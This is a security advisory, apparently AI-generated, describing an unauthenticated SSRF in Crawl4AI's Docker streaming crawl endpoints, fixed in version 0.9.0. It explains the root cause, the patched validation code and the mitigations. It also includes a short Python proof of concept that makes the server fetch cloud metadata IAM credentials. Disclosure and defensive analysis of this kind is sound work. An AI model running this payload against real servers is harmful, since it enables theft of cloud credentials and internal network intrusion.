CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



GHSA-wm69-2pc3-rmmf: Unauthenticated Server-Side Request Forgery in Crawl4AI Docker Streaming Crawl Path

Amit Schendel
Senior Security Researcher

Jun 18, 2026 · 5 min read

Executive Summary (TL;DR)

A bypass of SSRF validation on the streaming crawl endpoints in Crawl4AI Docker deployments allows unauthenticated remote attackers to query internal network services and cloud metadata endpoints.

An unauthenticated Server-Side Request Forgery (SSRF) vulnerability was identified in the Crawl4AI Docker API server before version 0.9.0. The streaming crawl endpoint (/crawl/stream) and the standard crawl endpoint with streaming enabled (/crawl with crawler_config.stream=true) bypass the validate_url_destination security filter. Remote, unauthenticated attackers can therefore make the server issue HTTP requests to internal infrastructure, loopback interfaces, or cloud metadata endpoints such as those on AWS and GCP.

Vulnerability Overview

Crawl4AI is an open-source, LLM-friendly web crawler and scraper designed to convert web pages into structured text formats. To facilitate multi-user deployments, the project provides a containerized FastAPI application. The Docker server exposes endpoints that accept scraping requests, allowing remote consumers to execute crawl tasks on target URLs.

The attack surface of the Crawl4AI Docker container is unauthenticated by default. This public exposure necessitates strict validation controls to prevent attackers from using the crawler as a proxy. If a user-supplied target URL is not constrained, the backend crawler can be abused to perform network queries targeting unauthorized locations.

This security posture is compromised when handling streaming crawl operations. Specifically, the POST /crawl/stream endpoint and streaming-configured calls to POST /crawl bypass the internal validation engine. This bypass results in an unauthenticated Server-Side Request Forgery (SSRF) vulnerability. The flaw allows remote attackers to probe internal networks and cloud infrastructure.

Root Cause Analysis

The root cause of the vulnerability lies in the structural discrepancy between the streaming and non-streaming request handlers inside the deploy/docker/api.py router. While standard crawler operations route through an input normalization routine that calls validate_url_destination(), the streaming engine does not.

In the vulnerable implementation of deploy/docker/api.py, requests sent directly to /crawl/stream map to handle_stream_crawl_request(). Similarly, requests sent to /crawl with crawler_config.stream=true are diverted straight to the same streaming handler. In that version, handle_stream_crawl_request() processes the raw seed URLs directly and never calls validate_url_destination().

This validation gap persisted due to regression testing shortcomings. The existing test suite verified the generic existence of SSRF filtering in some handlers but did not validate coverage across every independent path. Consequently, the streaming controller remained completely exposed to malicious user inputs.
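
The coverage gap described above can be sketched as a per-path regression check. This is a minimal illustration, not the project's test suite: the handlers, the stand-in validator, and the unguarded_paths() helper are all hypothetical, and the stand-in rejects only a single probe address.

```python
from typing import Callable, Dict, List

INTERNAL_PROBE = "http://169.254.169.254/"  # link-local metadata address


class BlockedDestination(ValueError):
    """Raised by the stand-in validator for internal destinations."""


def validate_url_destination(url: str) -> None:
    # Stand-in for the real filter: rejects only the probe address.
    if url.startswith(INTERNAL_PROBE):
        raise BlockedDestination(url)


def handle_crawl(urls: List[str]) -> str:
    # Non-streaming path: validates every seed before crawling.
    for url in urls:
        validate_url_destination(url)
    return "crawled"


def handle_stream_unvalidated(urls: List[str]) -> str:
    # Shape of the vulnerable streaming path: seeds are used as-is.
    return "streamed"


def handle_stream_validated(urls: List[str]) -> str:
    # Shape of the fixed streaming path: same check as the non-streaming one.
    for url in urls:
        validate_url_destination(url)
    return "streamed"


def unguarded_paths(handlers: Dict[str, Callable[[List[str]], str]]) -> List[str]:
    """Return the names of handlers that accept the internal probe URL."""
    missing = []
    for name, handler in handlers.items():
        try:
            handler([INTERNAL_PROBE])
        except BlockedDestination:
            continue
        missing.append(name)
    return missing


before = unguarded_paths({"/crawl": handle_crawl, "/crawl/stream": handle_stream_unvalidated})
after = unguarded_paths({"/crawl": handle_crawl, "/crawl/stream": handle_stream_validated})
print(before)  # ['/crawl/stream']
print(after)   # []
```

Checking every entry path with the same probe, rather than asserting that the filter exists somewhere, is what would have surfaced the streaming handler.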

Code Analysis

To illustrate the structural omission, we compare the original logic with the patch implemented in version 0.9.0. In the patched state, the development team introduced _normalize_and_validate_seeds() to centralize input filtering and keep validation from drifting between API handlers.

Below is the unified validation wrapper introduced in the patched code. This function ensures that every URL is normalized and subjected to validate_url_destination() before any networking context is initialized:

# Introduced in v0.9.0 inside deploy/docker/api.py
def _normalize_and_validate_seeds(urls: List[str]) -> List[str]:
    """Prefix bare hosts with https:// and SSRF-validate every seed URL's
    destination. Shared by the streaming and non-streaming crawl handlers."""
    urls = [('https://' + url) if not url.startswith(('http://', 'https://')) and not url.startswith(('raw:', 'raw://')) else url for url in urls]
    for url in urls:
        validate_url_destination(url)
    return urls
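
To make the normalization step easier to follow, the list comprehension above can be unrolled into a single-URL helper. This is an illustrative rewrite only: normalize_seed() is a hypothetical name, and the validation call is left out so the prefixing rule can be seen on its own.

```python
def normalize_seed(url: str) -> str:
    """Apply the same prefixing rule as the comprehension, for one URL."""
    # URLs that already carry an http(s) scheme or a raw: prefix pass through.
    if url.startswith(("http://", "https://", "raw:", "raw://")):
        return url
    # Everything else is treated as a bare host and gets https:// prepended.
    return "https://" + url


print(normalize_seed("example.com"))               # https://example.com
print(normalize_seed("169.254.169.254/latest/"))   # https://169.254.169.254/latest/
print(normalize_seed("http://10.0.0.5:8080/"))     # http://10.0.0.5:8080/
print(normalize_seed("raw:<html></html>"))         # raw:<html></html>
```

The second case is the relevant one for SSRF: a bare internal address is first turned into a full URL, so the destination check that follows sees the same target the crawler would fetch.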

In the patched version of handle_stream_crawl_request(), the validation is called immediately upon receiving the parameter inputs. This enforces the exact security boundary already established in the standard crawl endpoint:

async def handle_stream_crawl_request(
    urls: List[str],
    browser_config: dict,
    crawler_config: dict,
    config: dict,
    hooks_config: Optional[dict] = None
) -> Tuple[AsyncWebCrawler, AsyncGenerator, Optional[Dict]]:
    """Handle streaming crawl requests with optional hooks."""
    hooks_info = None
    crawler = None
    try:
        # Enforce SSRF validation for streaming sessions
        urls = _normalize_and_validate_seeds(urls)
        # Remaining streaming process continues safely...

Crucially, the SSRF engine (deploy/docker/utils.py) defines blocklists for common internal network ranges. These include the IPv4 private blocks (RFC 1918), the link-local range (169.254.0.0/16), and standard internal hostnames such as metadata.google.internal and kubernetes.default. Applying _normalize_and_validate_seeds() stops the attack because the validator resolves each hostname and rejects any destination that falls in a blocked range.
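
The kind of check described above can be sketched with the Python standard library. This is not the code in deploy/docker/utils.py: check_destination(), is_allowed(), and BLOCKED_HOSTNAMES are hypothetical names, and the blocked categories are limited to the ones named in this report.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hostnames named in this report; the real blocklist may differ.
BLOCKED_HOSTNAMES = {"metadata.google.internal", "kubernetes.default"}


class BlockedDestinationError(ValueError):
    """Raised when a URL points at a blocked host or address range."""


def check_destination(url: str) -> None:
    host = urlsplit(url).hostname
    if not host:
        raise BlockedDestinationError(f"no host in {url!r}")
    if host.lower().rstrip(".") in BLOCKED_HOSTNAMES:
        raise BlockedDestinationError(f"blocked hostname {host!r}")
    try:
        # Resolve the host; literal IP addresses are returned without a DNS query.
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror as exc:
        raise BlockedDestinationError(f"cannot resolve {host!r}") from exc
    for info in infos:
        # Drop any IPv6 zone suffix such as "%eth0" before parsing.
        ip = ipaddress.ip_address(info[4][0].split("%")[0])
        if ip.version == 6 and ip.ipv4_mapped is not None:
            ip = ip.ipv4_mapped
        if ip.is_private or ip.is_loopback or ip.is_link_local:
            raise BlockedDestinationError(f"{host!r} resolves to blocked address {ip}")


def is_allowed(url: str) -> bool:
    try:
        check_destination(url)
    except BlockedDestinationError:
        return False
    return True


print(is_allowed("http://169.254.169.254/latest/meta-data/"))  # False
print(is_allowed("http://metadata.google.internal/"))          # False
print(is_allowed("http://8.8.8.8/"))                           # True
```

Every resolved address is checked, not just the first, so a hostname with one public and one internal record is still rejected. A check of this shape validates the address at request time only; it does not by itself pin the address the crawler later connects to.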

Exploitation & Attack Flow

Exploitation requires no authentication and no special application state. An attacker sends a JSON payload directly to the /crawl/stream endpoint on an exposed server, which makes the target host fetch and return restricted local resources.

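The attack flow is short: the attacker posts a seed URL pointing at an internal address to /crawl/stream, handle_stream_crawl_request() passes it to the crawler without calling validate_url_destination(), the crawler fetches the internal resource, and the content is streamed back to the attacker.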

Below is a practical Python proof-of-concept script illustrating the exploitation technique against an unprotected target. The script triggers the streaming endpoint to crawl the cloud instance metadata service:

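import requests

# Placeholder address of an exposed Crawl4AI Docker server.
target_url = 'http://target-crawl4ai-server:11235/crawl/stream'

# The seed URL points at the link-local cloud metadata service, not a public site.
payload = {
    'urls': ['http://169.254.169.254/latest/meta-data/iam/security-credentials/'],
    'browser_config': {},
    'crawler_config': {}
}

# No credentials are sent; stream=True reads the response as it arrives.
response = requests.post(target_url, json=payload, stream=True, timeout=30)
for line in response.iter_lines():
    if line:  # skip empty keep-alive lines
        print(line.decode('utf-8'))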

Impact Assessment

The security impact of this vulnerability is classified as High (CVSS 8.6). Because the server acts as an open proxy to access internal domains, the attack scope is changed (S:C). This allows the attacker to cross security boundaries and read data from isolated environments.
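
As a worked check, the 8.6 figure can be reproduced from the vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N using the base score equations and metric weights from the CVSS v3.1 specification. The function and constant names below are illustrative, and only the scope-changed branch of the formula is implemented.

```python
import math

# CVSS v3.1 metric weights for the values in this advisory's vector.
AV_NETWORK = 0.85
AC_LOW = 0.77
PR_NONE = 0.85
UI_NONE = 0.85
C_HIGH, I_NONE, A_NONE = 0.56, 0.0, 0.0


def roundup(value: float) -> float:
    """Round up to one decimal place, as defined in the CVSS v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score_scope_changed(c: float, i: float, a: float) -> float:
    """Base score for a vector with S:C and the exploitability metrics above."""
    iss = 1 - (1 - c) * (1 - i) * (1 - a)
    impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    exploitability = 8.22 * AV_NETWORK * AC_LOW * PR_NONE * UI_NONE
    if impact <= 0:
        return 0.0
    return roundup(min(1.08 * (impact + exploitability), 10))


score = base_score_scope_changed(C_HIGH, I_NONE, A_NONE)
print(score)  # 8.6
```

The changed scope is what lifts the score: with S:U and otherwise identical metrics, the same equations give 7.5.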

A successful exploit compromises confidentiality on a systemic level (C:H). In cloud environments (such as AWS, GCP, or Azure), the metadata server exposes temporary IAM credentials, service tokens, and instance metadata. Attackers can leverage these credentials to compromise broader cloud infrastructure.

Furthermore, attackers can use the unauthenticated container as an internal port scanner. By parsing the response times and HTTP responses from streaming requests, attackers can map out the internal topology. This identifies adjacent microservices, databases, and configuration consoles that are not exposed to the public internet.

Remediation & Mitigation

Remediation requires upgrading the crawl4ai installation to version 0.9.0 or higher. This version applies the _normalize_and_validate_seeds() wrapper in the streaming handler as well as the non-streaming one, which closes the bypass path.

If upgrading is delayed, organizations should restrict container egress traffic. Implement network policies using egress firewalls to prevent the Docker container from initiating outbound connections to RFC 1918 networks (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) and the link-local range (169.254.0.0/16).

Additionally, avoid exposing the Crawl4AI Docker server directly to the public internet without an authentication layer. Placing the container behind a reverse proxy, API gateway, or VPN that enforces token-based authorization mitigates the risk of direct exposure.
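
The token check such a gateway performs can be sketched as follows. This is a minimal illustration under stated assumptions: is_authorized() is a hypothetical helper, the token is a static shared secret passed in by the caller, and nothing here is part of Crawl4AI itself.

```python
import hmac
from typing import Mapping


def is_authorized(headers: Mapping[str, str], expected_token: str) -> bool:
    """Return True only for 'Authorization: Bearer <token>' with the expected token."""
    scheme, _, token = headers.get("Authorization", "").partition(" ")
    if scheme.lower() != "bearer" or not token:
        return False
    # Constant-time comparison avoids leaking how many characters matched.
    return hmac.compare_digest(token.encode(), expected_token.encode())


print(is_authorized({"Authorization": "Bearer s3cret"}, "s3cret"))  # True
print(is_authorized({}, "s3cret"))                                  # False
```

A request that fails this check would be rejected by the proxy before it reaches /crawl or /crawl/stream, so an unauthenticated caller never gets to supply a seed URL.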

Technical Appendix

CVSS Score
8.6 / 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Affected Systems

Crawl4AI Docker API Server

Affected Versions Detail

Product               Affected Versions   Fixed Version
crawl4ai (Unclecode)  < 0.9.0             0.9.0

Attribute            Detail
CWE ID               CWE-918
Attack Vector        Network (AV:N)
Attack Complexity    Low (AC:L)
Privileges Required  None (PR:N)
CVSS Score           8.6 (High)
Exploit Status       Proof-of-Concept (PoC)
CISA KEV Status      Not Listed

MITRE ATT&CK Mapping

  • T1190: Exploit Public-Facing Application (Initial Access)
  • T1552.005: Unsecured Credentials: Cloud Metadata Service (Credential Access)
  • T1046: Network Service Discovery (Discovery)
  • T1090: Proxy (Command and Control)

CWE-918: Server-Side Request Forgery (SSRF)

The web application's server-side engine receives an untrusted URL, resolves it, and fetches the resource without verifying whether the host is within a restricted network boundary.

Known Exploits & Detection

GitHub Advisory: Vulnerability report highlighting the SSRF validation gap in handle_stream_crawl_request.

Vulnerability Timeline

  • 2026-06-18: Security advisory GHSA-wm69-2pc3-rmmf published.
  • 2026-06-18: Crawl4AI version 0.9.0 published, containing the official SSRF validation fix.
